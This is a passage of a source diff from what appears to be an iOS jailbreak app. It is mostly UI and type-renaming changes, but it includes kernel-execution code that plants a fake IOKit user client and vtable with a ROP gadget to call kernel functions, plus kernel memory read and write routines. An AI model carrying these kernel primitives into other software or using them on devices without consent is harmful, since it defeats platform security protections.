+    [self.crypticButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.xerusDesignButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.appleDryButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.robButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.midnightChipButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.geoSn0wButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.swaggoButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.jailbreakbusterButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.jakeashacksButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.saurikButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.siguzaButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.externalistButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.realBrightiupButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.nitoTVButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.matchsticButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.umanghereButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.miscMistyButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.benButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.samGButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.dennisButton setTitleColor:[UIColor whiteColor] forState:normal];
+}
+
+-(void) lightModeCreditsView:(NSNotification *) notification  {
+    
+    [self.ianBeerButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.bazadButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.morpheusButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.xerubButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.psychoTeaButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.stekButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.ninjaPrawnButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.crypticButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.xerusDesignButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.appleDryButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.robButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.midnightChipButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.geoSn0wButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.swaggoButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.jailbreakbusterButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.jakeashacksButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.saurikButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.siguzaButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.externalistButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.realBrightiupButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.nitoTVButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.matchsticButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.umanghereButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.miscMistyButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.benButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.samGButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.dennisButton setTitleColor:[UIColor blackColor] forState:normal];
+}
+
 + (NSURL *)getURLForUserName:(NSString *)userName {
    if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"tweetbot://"]]) {
        return [NSURL URLWithString:[NSString stringWithFormat:@"tweetbot:///user_profile/%@", userName]];
@@ -110,30 +165,14 @@
    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Jakeashacks"] options:@{} completionHandler:nil];
 }

-(IBAction)tappedOnJonathanSeals:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"JonathanSeals"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnSaurik:(id)sender{
    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"saurik"] options:@{} completionHandler:nil];
 }

-(IBAction)tappedOnUndecimusResources:(id)sender{
-    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus-Resources"] options:@{} completionHandler:nil];
-}
-
-(IBAction)tappedOnTihmstar:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"tihmstar"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnSiguza:(id)sender{
    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"s1guza"] options:@{} completionHandler:nil];
 }

-(IBAction)tappedOnS0rryMyBad:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"S0rryMyBad"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnExternalist:(id)sender{
    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Externalist"] options:@{} completionHandler:nil];
 }
@@ -158,24 +197,20 @@
    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"MiscMisty"] options:@{} completionHandler:nil];
 }

-(IBAction)tappedOnSemaphore:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"notcom"] options:@{} completionHandler:nil];
-}
-
-(IBAction)tappedOnPimskeks:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"pimskeks"] options:@{} completionHandler:nil];
-}
-
-(IBAction)tappedOnLibimobiledevice:(id)sender{
-    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://github.com/libimobiledevice"] options:@{} completionHandler:nil];
-}
-
-(IBAction)tappedOnCoolStar:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"coolstarorg"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnBen:(id)sender{
    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"benjweaverdev"] options:@{} completionHandler:nil];
 }

+- (IBAction)tappedOnSamG:(id)sender{
+    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://reddit.com/u/Samg_is_a_Ninja"] options:@{} completionHandler:nil];
+}
+
+- (IBAction)tappedOnDennis:(id)sender{
+    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"DennisBednarz"] options:@{} completionHandler:nil];
+}
+
+- (CGFloat)tableView:(UITableView *)tableView heightForRowAtIndexPath:(NSIndexPath *)indexPath {
+    return 44;
+}
+
@end
@@ -14,7 +14,7 @@ NSDictionary *parseDependsOrProvides(NSString *string);
 BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
 NSString *versionOfPkg(NSString *pkg);
 NSArray *resolveDepsForPkg(NSString * _Nonnull pkg, BOOL noPreDeps);
-BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps);
+BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject);
 NSDictionary *getPkgs(void);
 NSString *debForPkg(NSString *pkg);
 NSArray <NSString*> *debsForPkgs(NSArray <NSString*> *pkgs);
@@ -324,7 +324,7 @@ NSArray *resolveDepsForPkg(NSString *pkg, BOOL preDeps) {
    return resolveDepsForPkgWithQueue(pkg, nil, preDeps);
 }

-BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps) {
+BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject) {
    NSArray *pkgsForPkg = resolveDepsForPkg(pkg, preDeps);
    if (pkgsForPkg == nil || pkgsForPkg.count < 1) {
        LOG("Found no pkgs to install for \"%@\"", pkg);
@@ -342,7 +342,7 @@ BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps) {
        // Already installed all these
        return YES;
    }
-    if (!extractDebs(debsForPkg)) {
+    if (!extractDebs(debsForPkg, doInject)) {
        LOG("Failed to extract debs for \"%@\"", pkg);
        return NO;
    }
@@ -403,10 +403,7 @@ NSDictionary *getPkgs(void) {
                }
            }
        }
-        if (line) {
-            free(line);
-            line = NULL;
-        }
+        SafeFreeNULL(line);
        fclose(pkgs_file);
        
        mpkgs[@"firmware"] = @{
@@ -7,17 +7,13 @@
 //

 #import <UIKit/UIKit.h>
+#import <UIProgressHUD.h>
 #import "common.h"

-#define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)
-
-static NSString *message = nil;
-#define SETMESSAGE(msg) (message = msg)
-
 #define _assert(test, message, fatal) do \
    if (!(test)) { \
        int saved_errno = errno; \
-        LOG("__assert(%d:%s)@%s:%u[%s]", saved_errno, #test, __FILENAME__, __LINE__, __FUNCTION__); \
+        LOG("_assert(%d:%s)@%s:%u[%s]", saved_errno, #test, __FILENAME__, __LINE__, __FUNCTION__); \
        if (message != nil) \
            showAlert(fatal ? @"Error (Fatal)" : @"Error (Nonfatal)", [NSString stringWithFormat:@"Errno: %d\nTest: %s\nFilename: %s\nLine: %d\nFunction: %s\nDescription: %@", saved_errno, #test, __FILENAME__, __LINE__, __FUNCTION__, message], true, false); \
        else \
@@ -28,17 +24,67 @@ static NSString *message = nil;
            } else { \
                return; \
            } \
+        errno = saved_errno; \
        } \
    } \
 while (false)

-#define NOTICE(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
+#define notice(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
+
+#define status(msg, btnenbld, nvbenbld) do { \
+    dispatch_async(dispatch_get_main_queue(), ^{ \
+        if ([[[[[JailbreakViewController sharedController] goButton] titleLabel] text] isEqualToString:msg]) return; \
+        LOG("Status: %@", msg); \
+        [UIView performWithoutAnimation:^{ \
+            [[[JailbreakViewController sharedController] goButton] setEnabled:btnenbld]; \
+            [[[JailbreakViewController sharedController] settingsButton] setUserInteractionEnabled:nvbenbld]; \
+            [[[JailbreakViewController sharedController] goButton] setTitle:msg forState: btnenbld ? UIControlStateNormal : UIControlStateDisabled]; \
+            [[[JailbreakViewController sharedController] goButton] layoutIfNeeded]; \
+        }]; \
+    }); \
+} while (false)
+
+#define progress(x) do { \
+    dispatch_async(dispatch_get_main_queue(), ^{ \
+        if ([[[[JailbreakViewController sharedController] exploitMessageLabel] text] isEqualToString:x]) return; \
+        LOG("Progress: %@", x); \
+        [[[JailbreakViewController sharedController] exploitMessageLabel] setText:x]; \
+    }); \
+} while (false)

@interface JailbreakViewController : UIViewController
@property (weak, nonatomic) IBOutlet UIButton *goButton;
@property (weak, nonatomic) IBOutlet UITextView *outputView;
+@property (weak, nonatomic) IBOutlet UIButton *darkModeButton;
+@property (weak, nonatomic) IBOutlet UIButton *settingsButton;
+@property (weak, nonatomic) IBOutlet UIButton *mainDevsButton;
+
+@property (weak, nonatomic) IBOutlet UILabel *exploitProgressLabel;
+@property (weak, nonatomic) IBOutlet UILabel *exploitMessageLabel;
+@property (weak, nonatomic) IBOutlet UILabel *u0Label;
+@property (weak, nonatomic) IBOutlet UILabel *uOVersionLabel;
+
+@property (weak, nonatomic) IBOutlet UIProgressView *jailbreakProgressBar;
+
+@property (weak, nonatomic) IBOutlet UIView *mainView;
+@property (weak, nonatomic) IBOutlet UIView *creditsView;
+@property (weak, nonatomic) IBOutlet UIView *settingsView;
+@property (weak, nonatomic) IBOutlet UIView *mainDevView;
+@property (weak, nonatomic) IBOutlet UIView *backgroundView;
+
+@property (weak, nonatomic) IBOutlet UINavigationBar *settingsNavBar;
+@property (weak, nonatomic) IBOutlet UINavigationBar *creditsNavBar;
+
+@property (weak, nonatomic) IBOutlet UILabel *jailbreakLabel;
+@property (weak, nonatomic) IBOutlet UILabel *byLabel;
+@property (weak, nonatomic) IBOutlet UILabel *uncoverLabel;
+@property (weak, nonatomic) IBOutlet UILabel *supportedOSLabel;
+@property (weak, nonatomic) IBOutlet UILabel *UIByLabel;
+@property (weak, nonatomic) IBOutlet UILabel *firstAndLabel;
+@property (weak, nonatomic) IBOutlet UILabel *fourthAndLabel;
+
+
@property (readonly) JailbreakViewController *sharedController;
-@property (weak, nonatomic) IBOutlet NSLayoutConstraint *goButtonSpacing;
@property (assign) BOOL canExit;

 double uptime(void);
@@ -48,9 +94,49 @@ NSString *hexFromInt(NSInteger val);
 - (IBAction)tappedOnJailbreak:(id)sender;
 +(JailbreakViewController*)sharedController;
 - (void)appendTextToOutput:(NSString*)text;
+- (void)updateStatus;

@end

+static inline UIProgressHUD *addProgressHUD() {
+    __block UIProgressHUD *hud = nil;
+    dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
+    dispatch_async(dispatch_get_main_queue(), ^{
+        hud = [[UIProgressHUD alloc] init];
+        [hud setAutoresizingMask:UIViewAutoresizingFlexibleWidth | UIViewAutoresizingFlexibleHeight];
+        UIView *view = [[JailbreakViewController sharedController] view];
+        [hud showInView:view];
+        dispatch_semaphore_signal(semaphore);
+    });
+    dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
+    return hud;
+}
+
+static inline void removeProgressHUD(UIProgressHUD *hud) {
+    if (hud == nil) {
+        return;
+    }
+    dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
+    dispatch_async(dispatch_get_main_queue(), ^{
+        [hud hide];
+        [hud done];
+        dispatch_semaphore_signal(semaphore);
+    });
+    dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
+}
+
+static inline void updateProgressHUD(UIProgressHUD *hud, NSString *msg) {
+    if (hud == nil) {
+        return;
+    }
+    dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
+    dispatch_async(dispatch_get_main_queue(), ^{
+        [hud setText:msg];
+        dispatch_semaphore_signal(semaphore);
+    });
+    dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
+}
+
 static inline void showAlertWithCancel(NSString *title, NSString *message, Boolean wait, Boolean destructive, NSString *cancel) {
    dispatch_semaphore_t semaphore;
    if (wait)
@@ -1,7 +1,6 @@
-#include <inttypes.h>
+#include <common.h>
 #include <mach/mach.h>
-#include <stdbool.h>

-bool init_kexecute(void);
-void term_kexecute(void);
-uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);
+bool init_kexec(void);
+void term_kexec(void);
+kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6);
@@ -1,6 +1,6 @@
 #include "KernelExecution.h"
 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "find_port.h"
 #include "kernel_call.h"
@@ -30,50 +30,49 @@ static mach_port_t prepare_user_client()
        exit(EXIT_FAILURE);
    }

-    LOG("got user client: 0x%x", user_client);
    return user_client;
 }

 static mach_port_t user_client;
-static uint64_t IOSurfaceRootUserClient_port;
-static uint64_t IOSurfaceRootUserClient_addr;
-static uint64_t fake_vtable;
-static uint64_t fake_client;
+static kptr_t IOSurfaceRootUserClient_port;
+static kptr_t IOSurfaceRootUserClient_addr;
+static kptr_t fake_vtable;
+static kptr_t fake_client;
 static const int fake_kalloc_size = 0x1000;
 #endif
-static pthread_mutex_t kexecute_lock;
+static pthread_mutex_t kexec_lock;

-bool init_kexecute()
+bool init_kexec()
 {
 #if __arm64e__
    if (!parameters_init()) return false;
    kernel_task_port = tfp0;
    if (!MACH_PORT_VALID(kernel_task_port)) return false;
    current_task = ReadKernel64(task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
-    if (!ISADDR(current_task)) return false;
-    kernel_task = ReadKernel64(GETOFFSET(kernel_task));
-    if (!ISADDR(kernel_task)) return false;
+    if (!KERN_POINTER_VALID(current_task)) return false;
+    kernel_task = ReadKernel64(getoffset(kernel_task));
+    if (!KERN_POINTER_VALID(kernel_task)) return false;
    if (!kernel_call_init()) return false;
 #else
    user_client = prepare_user_client();
    if (!MACH_PORT_VALID(user_client)) return false;

    // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
-    IOSurfaceRootUserClient_port = get_address_of_port(getpid(), user_client); // UserClients are just mach_ports, so we find its address
-    if (!ISADDR(IOSurfaceRootUserClient_port)) return false;
+    IOSurfaceRootUserClient_port = get_address_of_port(proc_struct_addr(), user_client); // UserClients are just mach_ports, so we find its address
+    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) return false;

    IOSurfaceRootUserClient_addr = ReadKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // The UserClient itself (the C++ object) is at the kobject field
-    if (!ISADDR(IOSurfaceRootUserClient_addr)) return false;
+    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_addr)) return false;

-    uint64_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
-    if (!ISADDR(IOSurfaceRootUserClient_vtab)) return false;
+    kptr_t IOSurfaceRootUserClient_vtab = ReadKernel64(IOSurfaceRootUserClient_addr); // vtables in C++ are at *object
+    if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_vtab)) return false;

    // The aim is to create a fake client, with a fake vtable, and overwrite the existing client with the fake one
    // Once we do that, we can use IOConnectTrap6 to call functions in the kernel as the kernel

    // Create the vtable in the kernel memory, then copy the existing vtable into there
    fake_vtable = kmem_alloc(fake_kalloc_size);
-    if (!ISADDR(fake_vtable)) return false;
+    if (!KERN_POINTER_VALID(fake_vtable)) return false;

    for (int i = 0; i < 0x200; i++) {
        WriteKernel64(fake_vtable + i * 8, ReadKernel64(IOSurfaceRootUserClient_vtab + i * 8));
@@ -81,7 +80,7 @@ bool init_kexecute()

    // Create the fake user client
    fake_client = kmem_alloc(fake_kalloc_size);
-    if (!ISADDR(fake_client)) return false;
+    if (!KERN_POINTER_VALID(fake_client)) return false;

    for (int i = 0; i < 0x200; i++) {
        WriteKernel64(fake_client + i * 8, ReadKernel64(IOSurfaceRootUserClient_addr + i * 8));
@@ -96,14 +95,14 @@ bool init_kexecute()
    // Now the userclient port we have will look into our fake user client rather than the old one

    // Replace IOUserClient::getExternalTrapForIndex with our ROP gadget (add x0, x0, #0x40; ret;)
-    WriteKernel64(fake_vtable + 8 * 0xB7, GETOFFSET(add_x0_x0_0x40_ret));
+    WriteKernel64(fake_vtable + 8 * 0xB7, getoffset(add_x0_x0_0x40_ret));

 #endif
-    pthread_mutex_init(&kexecute_lock, NULL);
+    pthread_mutex_init(&kexec_lock, NULL);
    return true;
 }

-void term_kexecute()
+void term_kexec()
 {
 #if __arm64e__
    kernel_call_deinit();
@@ -113,15 +112,15 @@ void term_kexecute()
    kmem_free(fake_client, fake_kalloc_size);
    IOServiceClose(user_client);
 #endif
-    pthread_mutex_destroy(&kexecute_lock);
+    pthread_mutex_destroy(&kexec_lock);
 }

-uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6)
+kptr_t kexec(kptr_t ptr, kptr_t x0, kptr_t x1, kptr_t x2, kptr_t x3, kptr_t x4, kptr_t x5, kptr_t x6)
 {
-    uint64_t returnval = 0;
-    pthread_mutex_lock(&kexecute_lock);
+    kptr_t returnval = 0;
+    pthread_mutex_lock(&kexec_lock);
 #if __arm64e__
-    returnval = kernel_call_7(addr, 7, x0, x1, x2, x3, x4, x5, x6);
+    returnval = kernel_call_7(ptr, 7, x0, x1, x2, x3, x4, x5, x6);
 #else
    // When calling IOConnectTrapX, this makes a call to iokit_user_client_trap, which is the user->kernel call (MIG). This then calls IOUserClient::getTargetAndTrapForIndex
    // to get the trap struct (which contains an object and the function pointer itself). This function calls IOUserClient::getExternalTrapForIndex, which is expected to return a trap.
@@ -133,15 +132,14 @@ uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t
    // We will pull a switch when doing so - retrieve the current contents, call the trap, put back the contents
    // (i'm not actually sure if the switch back is necessary but meh)

-    uint64_t offx20 = ReadKernel64(fake_client + 0x40);
-    uint64_t offx28 = ReadKernel64(fake_client + 0x48);
+    kptr_t offx20 = ReadKernel64(fake_client + 0x40);
+    kptr_t offx28 = ReadKernel64(fake_client + 0x48);
    WriteKernel64(fake_client + 0x40, x0);
-    WriteKernel64(fake_client + 0x48, addr);
+    WriteKernel64(fake_client + 0x48, ptr);
    returnval = IOConnectTrap6(user_client, 0, x1, x2, x3, x4, x5, x6);
    WriteKernel64(fake_client + 0x40, offx20);
    WriteKernel64(fake_client + 0x48, offx28);
 #endif
-    pthread_mutex_unlock(&kexecute_lock);
-    LOG(""ADDR"("ADDR", "ADDR", "ADDR", "ADDR", "ADDR", "ADDR", "ADDR"): "ADDR"", addr, x0, x1, x2, x3, x4, x5, x6, returnval);
+    pthread_mutex_unlock(&kexec_lock);
    return returnval;
 }
@@ -40,7 +40,7 @@ bool have_kmem_write()
    return MACH_PORT_VALID(tfp0);
 }

-size_t kread(uint64_t where, void* p, size_t size)
+size_t kread(kptr_t where, void* p, size_t size)
 {
    int rv;
    size_t offset = 0;
@@ -64,7 +64,7 @@ size_t kread(uint64_t where, void* p, size_t size)
    return offset;
 }

-size_t kwrite(uint64_t where, const void* p, size_t size)
+size_t kwrite(kptr_t where, const void* p, size_t size)
 {
    int rv;
    size_t offset = 0;
@@ -87,7 +87,7 @@ size_t kwrite(uint64_t where, const void* p, size_t size)
    return offset;
 }

-bool wkbuffer(uint64_t kaddr, void* buffer, size_t length)
+bool wkbuffer(kptr_t kaddr, void* buffer, size_t length)
 {
    if (!MACH_PORT_VALID(tfp0)) {
        LOG("attempt to write to kernel memory before any kernel memory write primitives available");
@@ -97,7 +97,7 @@ bool wkbuffer(uint64_t kaddr, void* buffer, size_t length)
    return (kwrite(kaddr, buffer, length) == length);
 }

-bool rkbuffer(uint64_t kaddr, void* buffer, size_t length)
+bool rkbuffer(kptr_t kaddr, void* buffer, size_t length)
 {
    if (!MACH_PORT_VALID(tfp0)) {
        LOG("attempt to read kernel memory but no kernel memory read primitives available");
@@ -107,27 +107,17 @@ bool rkbuffer(uint64_t kaddr, void* buffer, size_t length)
    return (kread(kaddr, buffer, length) == length);
 }

-void WriteKernel32(uint64_t kaddr, uint32_t val)
+bool WriteKernel32(kptr_t kaddr, uint32_t val)
 {
-    if (tfp0 == MACH_PORT_NULL) {
-        LOG("attempt to write to kernel memory before any kernel memory write primitives available");
-        return;
-    }
-    
-    wkbuffer(kaddr, &val, sizeof(val));
+    return wkbuffer(kaddr, &val, sizeof(val));
 }

-void WriteKernel64(uint64_t kaddr, uint64_t val)
+bool WriteKernel64(kptr_t kaddr, uint64_t val)
 {
-    if (tfp0 == MACH_PORT_NULL) {
-        LOG("attempt to write to kernel memory before any kernel memory write primitives available");
-        return;
-    }
-    
-    wkbuffer(kaddr, &val, sizeof(val));
+    return wkbuffer(kaddr, &val, sizeof(val));
 }

-uint32_t rk32_via_kmem_read_port(uint64_t kaddr)
+uint32_t rk32_via_kmem_read_port(kptr_t kaddr)
 {
    kern_return_t err;
    if (kmem_read_port == MACH_PORT_NULL) {
@@ -153,14 +143,14 @@ uint32_t rk32_via_kmem_read_port(uint64_t kaddr)
    return val;
 }

-uint32_t rk32_via_tfp0(uint64_t kaddr)
+uint32_t rk32_via_tfp0(kptr_t kaddr)
 {
    uint32_t val = 0;
    rkbuffer(kaddr, &val, sizeof(val));
    return val;
 }

-uint64_t rk64_via_kmem_read_port(uint64_t kaddr)
+uint64_t rk64_via_kmem_read_port(kptr_t kaddr)
 {
    uint64_t lower = rk32_via_kmem_read_port(kaddr);
    uint64_t higher = rk32_via_kmem_read_port(kaddr + 4);
@@ -168,14 +158,14 @@ uint64_t rk64_via_kmem_read_port(uint64_t kaddr)
    return full;
 }

-uint64_t rk64_via_tfp0(uint64_t kaddr)
+uint64_t rk64_via_tfp0(kptr_t kaddr)
 {
    uint64_t val = 0;
    rkbuffer(kaddr, &val, sizeof(val));
    return val;
 }

-uint32_t ReadKernel32(uint64_t kaddr)
+uint32_t ReadKernel32(kptr_t kaddr)
 {
    if (MACH_PORT_VALID(tfp0)) {
        return rk32_via_tfp0(kaddr);
@@ -187,7 +177,7 @@ uint32_t ReadKernel32(uint64_t kaddr)
    }
 }

-uint64_t ReadKernel64(uint64_t kaddr)
+uint64_t ReadKernel64(kptr_t kaddr)
 {
    if (MACH_PORT_VALID(tfp0)) {
        return rk64_via_tfp0(kaddr);
@@ -199,11 +189,10 @@ uint64_t ReadKernel64(uint64_t kaddr)
    }
 }

-const uint64_t kernel_address_space_base = 0xffff000000000000;
 void kmemcpy(uint64_t dest, uint64_t src, uint32_t length)
 {
-    if (dest >= kernel_address_space_base) {
-        // copy to kernel:
+    if (KERN_POINTER_VALID(dest)) {
+        // copy to kernel
        wkbuffer(dest, (void*)src, length);
    } else {
        // copy from kernel
@@ -211,7 +200,7 @@ void kmemcpy(uint64_t dest, uint64_t src, uint32_t length)
    }
 }

-uint64_t kmem_alloc(uint64_t size)
+kptr_t kmem_alloc(uint64_t size)
 {
    if (!MACH_PORT_VALID(tfp0)) {
        LOG("attempt to allocate kernel memory before any kernel memory write primitives available");
@@ -230,7 +219,7 @@ uint64_t kmem_alloc(uint64_t size)
    return addr;
 }

-uint64_t kmem_alloc_wired(uint64_t size)
+kptr_t kmem_alloc_wired(uint64_t size)
 {
    if (!MACH_PORT_VALID(tfp0)) {
        LOG("attempt to allocate kernel memory before any kernel memory write primitives available");
@@ -241,21 +230,15 @@ uint64_t kmem_alloc_wired(uint64_t size)
    mach_vm_address_t addr = 0;
    mach_vm_size_t ksize = round_page_kernel(size);

-    LOG("vm_kernel_page_size: %lx", vm_kernel_page_size);
-
    err = mach_vm_allocate(tfp0, &addr, ksize + 0x4000, VM_FLAGS_ANYWHERE);
    if (err != KERN_SUCCESS) {
        LOG("unable to allocate kernel memory via tfp0: %s %x", mach_error_string(err), err);
        return 0;
    }

-    LOG("allocated address: %llx", addr);
-
    addr += 0x3fff;
    addr &= ~0x3fffull;

-    LOG("address to wire: %llx", addr);
-
    host_t host = mach_host_self();
    err = mach_vm_wire(host, tfp0, addr, ksize, VM_PROT_READ | VM_PROT_WRITE);
    mach_port_deallocate(mach_task_self(), host);
@@ -268,7 +251,7 @@ uint64_t kmem_alloc_wired(uint64_t size)
    return addr;
 }

-bool kmem_free(uint64_t kaddr, uint64_t size)
+bool kmem_free(kptr_t kaddr, uint64_t size)
 {
    if (!MACH_PORT_VALID(tfp0)) {
        LOG("attempt to deallocate kernel memory before any kernel memory write primitives available");
@@ -286,7 +269,7 @@ bool kmem_free(uint64_t kaddr, uint64_t size)
    return true;
 }

-bool kmem_protect(uint64_t kaddr, uint32_t size, int prot)
+bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot)
 {
    if (!MACH_PORT_VALID(tfp0)) {
        LOG("attempt to change protection of kernel memory before any kernel memory write primitives available");
@@ -3,6 +3,7 @@

 #include <mach/mach.h>
 #include <stdbool.h>
+#include <common.h>

 /***** mach_vm.h *****/
 kern_return_t mach_vm_read(
@@ -43,33 +44,46 @@ kern_return_t mach_vm_protect(
    boolean_t set_maximum,
    vm_prot_t new_protection);

+kern_return_t mach_vm_remap(
+    mach_port_name_t target,
+    mach_vm_address_t *address,
+    mach_vm_size_t size,
+    mach_vm_offset_t mask,
+    int flags,
+    mach_port_name_t src_task,
+    mach_vm_address_t src_address,
+    boolean_t copy,
+    vm_prot_t *cur_protection,
+    vm_prot_t *max_protection,
+    vm_inherit_t inheritance);
+
 extern size_t kreads;
 extern size_t kwrites;
 extern mach_port_t tfp0;

-size_t kread(uint64_t where, void* p, size_t size);
-size_t kwrite(uint64_t where, const void* p, size_t size);
+size_t kread(kptr_t where, void* p, size_t size);
+size_t kwrite(kptr_t where, const void* p, size_t size);

 #define rk32(kaddr) ReadKernel32(kaddr)
 #define rk64(kaddr) ReadKernel64(kaddr)
-uint32_t ReadKernel32(uint64_t kaddr);
-uint64_t ReadKernel64(uint64_t kaddr);
+uint32_t ReadKernel32(kptr_t kaddr);
+uint64_t ReadKernel64(kptr_t kaddr);

 #define wk32(kaddr, val) WriteKernel32(kaddr, val)
 #define wk64(kaddr, val) WriteKernel64(kaddr, val)
-void WriteKernel32(uint64_t kaddr, uint32_t val);
-void WriteKernel64(uint64_t kaddr, uint64_t val);
+bool WriteKernel32(kptr_t kaddr, uint32_t val);
+bool WriteKernel64(kptr_t kaddr, uint64_t val);

-bool wkbuffer(uint64_t kaddr, void* buffer, size_t length);
-bool rkbuffer(uint64_t kaddr, void* buffer, size_t length);
+bool wkbuffer(kptr_t kaddr, void* buffer, size_t length);
+bool rkbuffer(kptr_t kaddr, void* buffer, size_t length);

 void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);

-bool kmem_protect(uint64_t kaddr, uint32_t size, int prot);
+bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot);

-uint64_t kmem_alloc(uint64_t size);
-uint64_t kmem_alloc_wired(uint64_t size);
-bool kmem_free(uint64_t kaddr, uint64_t size);
+kptr_t kmem_alloc(uint64_t size);
+kptr_t kmem_alloc_wired(uint64_t size);
+bool kmem_free(kptr_t kaddr, uint64_t size);

 void prepare_rk_via_kmem_read_port(mach_port_t port);
 void prepare_rwk_via_tfp0(mach_port_t port);
@@ -3,7 +3,7 @@

 extern uint32_t* offsets;

-enum kstruct_offset {
+enum kernel_offset {
